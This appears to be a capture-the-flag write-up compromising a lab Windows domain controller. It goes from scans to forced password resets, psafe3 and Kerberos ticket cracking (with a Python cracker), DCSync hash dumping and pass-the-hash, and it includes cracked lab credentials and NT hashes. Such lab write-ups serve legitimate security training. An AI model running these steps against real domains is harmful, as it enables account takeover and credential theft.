Administrator

Recon

nmap_scan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.178.45:21
Open 10.129.178.45:53
Open 10.129.178.45:88
Open 10.129.178.45:139
Open 10.129.178.45:135
Open 10.129.178.45:389
Open 10.129.178.45:445
Open 10.129.178.45:464
Open 10.129.178.45:593
Open 10.129.178.45:3268
Open 10.129.178.45:5985
Open 10.129.178.45:9389
Open 10.129.178.45:47001
Open 10.129.178.45:56394
Open 10.129.178.45:56361
Open 10.129.178.45:56347
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.178.45
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-10 19:13 UTC
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:13
Completed NSE at 19:13, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:13
Completed NSE at 19:13, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:13
Completed NSE at 19:13, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:13
Completed Parallel DNS resolution of 1 host. at 19:13, 0.12s elapsed
DNS resolution of 1 IPs took 0.12s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:13
Scanning 10.129.178.45 [16 ports]
Discovered open port 445/tcp on 10.129.178.45
Discovered open port 53/tcp on 10.129.178.45
Discovered open port 21/tcp on 10.129.178.45
Discovered open port 135/tcp on 10.129.178.45
Discovered open port 139/tcp on 10.129.178.45
Discovered open port 5985/tcp on 10.129.178.45
Discovered open port 464/tcp on 10.129.178.45
Discovered open port 593/tcp on 10.129.178.45
Discovered open port 47001/tcp on 10.129.178.45
Discovered open port 88/tcp on 10.129.178.45
Discovered open port 3268/tcp on 10.129.178.45
Discovered open port 56361/tcp on 10.129.178.45
Discovered open port 56394/tcp on 10.129.178.45
Discovered open port 9389/tcp on 10.129.178.45
Discovered open port 56347/tcp on 10.129.178.45
Discovered open port 389/tcp on 10.129.178.45
Completed Connect Scan at 19:13, 1.26s elapsed (16 total ports)
Initiating Service scan at 19:13
Scanning 16 services on 10.129.178.45
Completed Service scan at 19:14, 55.22s elapsed (16 services on 1 host)
NSE: Script scanning 10.129.178.45.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:14
Completed NSE at 19:14, 9.58s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:14
Completed NSE at 19:14, 1.78s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:14
Completed NSE at 19:14, 0.00s elapsed
Nmap scan report for 10.129.178.45
Host is up, received user-set (0.076s latency).
Scanned at 2024-11-10 19:13:06 UTC for 68s

PORT      STATE SERVICE       REASON  VERSION
21/tcp    open  ftp           syn-ack Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-11-11 02:13:16Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
56347/tcp open  msrpc         syn-ack Microsoft Windows RPC
56361/tcp open  msrpc         syn-ack Microsoft Windows RPC
56394/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-11-11T02:14:06
|_  start_date: N/A
|_clock-skew: 7h00m00s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 13338/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 2870/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 61556/udp): CLEAN (Timeout)
|   Check 4 (port 49009/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:14
Completed NSE at 19:14, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:14
Completed NSE at 19:14, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:14
Completed NSE at 19:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.30 seconds

Takeaways from the scan: the host is a domain controller (hostname DC, domain administrator.htb) exposing FTP, DNS, Kerberos, LDAP, SMB (signing required) and WinRM, and its clock runs seven hours ahead of the attacker's (clock-skew 7h00m00s), which matters for every Kerberos request later on.

Note: As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Olivia / ichliebedich

Creds: Olivia:ichliebedich

DNS

└─$ dig any administrator.htb @10.129.178.45 | grep -v ';'
administrator.htb.      600     IN      A       10.129.178.45
administrator.htb.      3600    IN      NS      dc.administrator.htb.
administrator.htb.      3600    IN      SOA     dc.administrator.htb. hostmaster.administrator.htb. 126 900 600 86400 3600
dc.administrator.htb.   3600    IN      A       10.129.178.45

AD Enumeration

└─$ cicada-mastertul -u Olivia -p ichliebedich -d administrator.htb -t 10.129.178.45 --full
                                |__ by - theblxckcicada __|
----------------------------------------------------
Target IP: 10.129.178.45
Domain: administrator.htb
Username: Olivia
Password: ichliebedich
Full Mode Enabled
---------------------------------------------------------------------------------------
[!x!] Scanning 10.129.178.45
[!] Enumerating SMB...
[-] Could not connect to SMB
[!] Connecting to WinRM...
[-] Could not connect to WinRM
[!] Enumerating Lookupsids using impacket...
[+] Lookupsids saved to /home/woyag/Desktop/Rooms/Administrator/mastertul/10.129.178.45/lookupsid_results/lookupsid_file.txt
[+] Users list saved to /home/woyag/Desktop/Rooms/Administrator/mastertul/10.129.178.45/lookupsid_results/users.txt
[!] Enumerating NPUsers using impacket...
[-] No NPUsers found
[!] Enumerating UserSPNs using impacket...
[-] No UserSPNs found
[!] Collecting Bloodhound Files...
[+] Bloodhound saved to /home/woyag/Desktop/Rooms/Administrator/mastertul/10.129.178.45/bloodhound_results
[!] Enumerating LDAP...
[+] LDAP saved to /home/woyag/Desktop/Rooms/Administrator/mastertul/10.129.178.45/ldap_results
 [!x!] Cleaning up...
Writeup.png
Writeup-1.png

Password Reset

The BloodHound data collected above (screenshots) shows a chain of password-reset rights: Olivia over michael, then michael over benjamin. bloodyAD resets each account in turn. Note that a reset is destructive (the user loses access and a password-change event is logged on the DC), so on a real engagement this needs sign-off first:

└─$ bloodyAD --host "10.129.178.45" -d "administrator.htb" -u "Olivia" -p "ichliebedich" set password michael 'Password123$'
[+] Password changed successfully!

└─$ bloodyAD --host "10.129.178.45" -d "administrator.htb" -u "michael" -p "Password123$" set password benjamin 'Password123$'
[+] Password changed successfully!

Creds: michael:Password123$

Creds: benjamin:Password123$

Gather data as Benjamin:

└─$ bloodhound-python -u 'benjamin' -p 'Password123$' -d administrator.htb -dc dc.administrator.htb -c all --zip

Nothing new...

FTP

The FTP server was open from the start, but none of the earlier accounts could log in; benjamin can:

└─$ ftp benjamin@administrator.htb
Connected to administrator.htb.
220 Microsoft FTP Service
331 Password required
Password: Password123$
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -alh
229 Entering Extended Passive Mode (|||53533|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
ftp> binary
200 Type set to I.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||53536|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************************************************************************************************|   952       12.21 KiB/s    00:00 ETA
226 Transfer complete.
952 bytes received in 00:00 (12.11 KiB/s)

pwsafe

└─$ file Backup.psafe3
Backup.psafe3: Password Safe V3 database

https://github.com/pwsafe/pwsafe
https://pwsafe.org

At first glance the client looked Windows-only (there is a Linux build too; see the note below).

After installing it, the client prompts for the master password. Since john supports the psafe3 format, crack it offline instead of guessing interactively:

└─$ pwsafe2john Backup.psafe3 > backup.hash
└─$ john --wordlist="$rockyou" backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)
1g 0:00:00:00 DONE (2024-11-10 15:36) 3.030g/s 18618p/s 18618c/s 18618C/s adriano..horoscope
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
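What pwsafe2john extracts, and why the crack above finishes in under a second, is easiest to see by reimplementing the check. The following is an added example, not code from the writeup or from the pwsafe project: it parses the V3 header (tag, 32-byte salt, little-endian iteration count, SHA-256 of the stretched key), performs the same key stretching the client does, emits a pwsafe2john-style line, and runs a small wordlist against a header constructed here with the master password recovered above. The salt and the header are constructed for the example; a real .psafe3 file continues with the Twofish-wrapped keys and the records, none of which a cracker needs.

```python
import hashlib
import struct

# Password Safe V3 header, as documented in the pwsafe formatV3 spec:
#   "PWS3" | SALT (32 bytes) | ITER (uint32 LE) | H(P') (32 bytes) | B1..B4 | IV | ...
# Only the first 72 bytes are needed to test a candidate master password.
TAG = b"PWS3"
HEADER_LEN = 72


def stretch_key(passphrase: bytes, salt: bytes, iterations: int) -> bytes:
    """pwsafe key stretching: SHA-256(passphrase || salt), then ITER more SHA-256 rounds."""
    x = hashlib.sha256(passphrase + salt).digest()
    for _ in range(iterations):
        x = hashlib.sha256(x).digest()
    return x


def parse_header(data: bytes):
    """Return (salt, iterations, H(P')) or raise if this is not a V3 database."""
    if len(data) < HEADER_LEN or data[:4] != TAG:
        raise ValueError("not a Password Safe V3 database")
    salt = data[4:36]
    (iterations,) = struct.unpack("<I", data[36:40])
    hp = data[40:72]
    return salt, iterations, hp


def to_john(data: bytes, label: str = "Backup") -> str:
    """The same fields pwsafe2john writes: label:$pwsafe$*3*<salt>*<iter>*<H(P')>."""
    salt, iterations, hp = parse_header(data)
    return f"{label}:$pwsafe$*3*{salt.hex()}*{iterations}*{hp.hex()}"


def check_passphrase(data: bytes, passphrase: bytes) -> bool:
    """True when SHA-256 of the stretched candidate equals the stored H(P')."""
    salt, iterations, hp = parse_header(data)
    return hashlib.sha256(stretch_key(passphrase, salt, iterations)).digest() == hp


def crack(data: bytes, wordlist):
    """Offline dictionary attack: no server, no lockout, ~2k SHA-256 calls per guess."""
    for word in wordlist:
        if check_passphrase(data, word.encode()):
            return word
    return None


def make_header(passphrase: bytes, salt: bytes, iterations: int = 2048) -> bytes:
    """Constructed test header: only the cracking-relevant fields, no Twofish blocks."""
    hp = hashlib.sha256(stretch_key(passphrase, salt, iterations)).digest()
    return TAG + salt + struct.pack("<I", iterations) + hp


# Constructed sample: deterministic salt, master password from the john run above.
SAMPLE_SALT = bytes(range(32))
SAMPLE_DB = make_header(b"tekieromucho", SAMPLE_SALT)

if __name__ == "__main__":
    print(to_john(SAMPLE_DB))
    print("cracked:", crack(SAMPLE_DB, ["adriano", "horoscope", "tekieromucho"]))
```

The iteration count is stored in the file and the default of 2048 is what john reported as "Cost 1"; raising it in the client's settings is the only knob the file owner has, since the hash of the stretched key sits in cleartext in the header.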

Interestingly, the application hides its window as soon as a screenshot tool is triggered; that behaviour can be turned off in the settings once logged in.

Writeup-2.png

Entries stored in the safe:

Username    Password
alexander   UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily       UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma        WwANQWnmJnGV07WQN8bMS7FMAbjNur

NOTE: there is also a Linux build:

Download DEB: https://sourceforge.net/projects/passwordsafe/

└─$ sudo apt install ./passwordsafe-ubuntu23-1.18.2-amd64.deb --fix-broken -y

Privilege Escalation (ethan)

emily can log in over WinRM, and BloodHound shows a path from her account to domain takeover via ethan (screenshot below).

Writeup-3.png

The credentials are valid (netexec confirms), but unlike the earlier edges a straight password reset of ethan is refused:

└─$ netexec smb administrator.htb -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
SMB         10.129.178.45   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.178.45   445    DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb

└─$ bloodyAD --host "10.129.178.45" -d "administrator.htb" -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" set password ethan 'Password123$'
...
msldap.commons.exceptions.LDAPModifyException: Password cant be changed. It may be because the oldpass provided is not valid.
You can try to use another password change protocol such as smbpasswd, server error may be more explicit.

BloodHound's suggested abuse for this edge is a targeted Kerberoast: write an SPN onto ethan, request a service ticket for it, and crack the RC4-encrypted ticket offline (targetedKerberoast removes the SPN again afterwards). The request runs under faketime +7h because the DC clock is seven hours ahead (nmap reported clock-skew 7h00m00s) and Kerberos rejects requests outside its five-minute tolerance:

└─$ faketime -f +7h targetedKerberoast -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" -d "administrator.htb" --request-user ethan
[*] Starting kerberoast attacks
[*] Attacking user (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$f23a234f1d6e2f924d6d57ede402b11b$...
---
➜ .\hashcat.exe --show .\hashes
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
➜ .\hashcat.exe -m 13100 -a 0 .\hashes .\rockyou.txt
...6e5daf365e187f93dca3cce382:limpbizkit

Creds: ethan:limpbizkit

Privilege Escalation (admin)

ethan holds replication rights over the domain (DCSync), so secretsdump can pull every NT hash over DRSUAPI without local admin on the DC; the RemoteOperations error below only reflects the missing admin access and is harmless here:
└─$ impacket-secretsdump 'ADMINISTRATOR.HTB'/'ethan':'limpbizkit'@'administrator.htb'

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::

Flags

└─$ evil-winrm -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e -i administrator.htb
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls /Users -Recurse -File -Filter *.txt | % { echo $_.FullName; cat $_.FullName; echo ""; }
C:\Users\Administrator\Desktop\root.txt
e7203e709a1f3093a30844de7032d340

C:\Users\emily\Desktop\user.txt
7f07aaf3a70eed7a3c438ffe7b5e7833
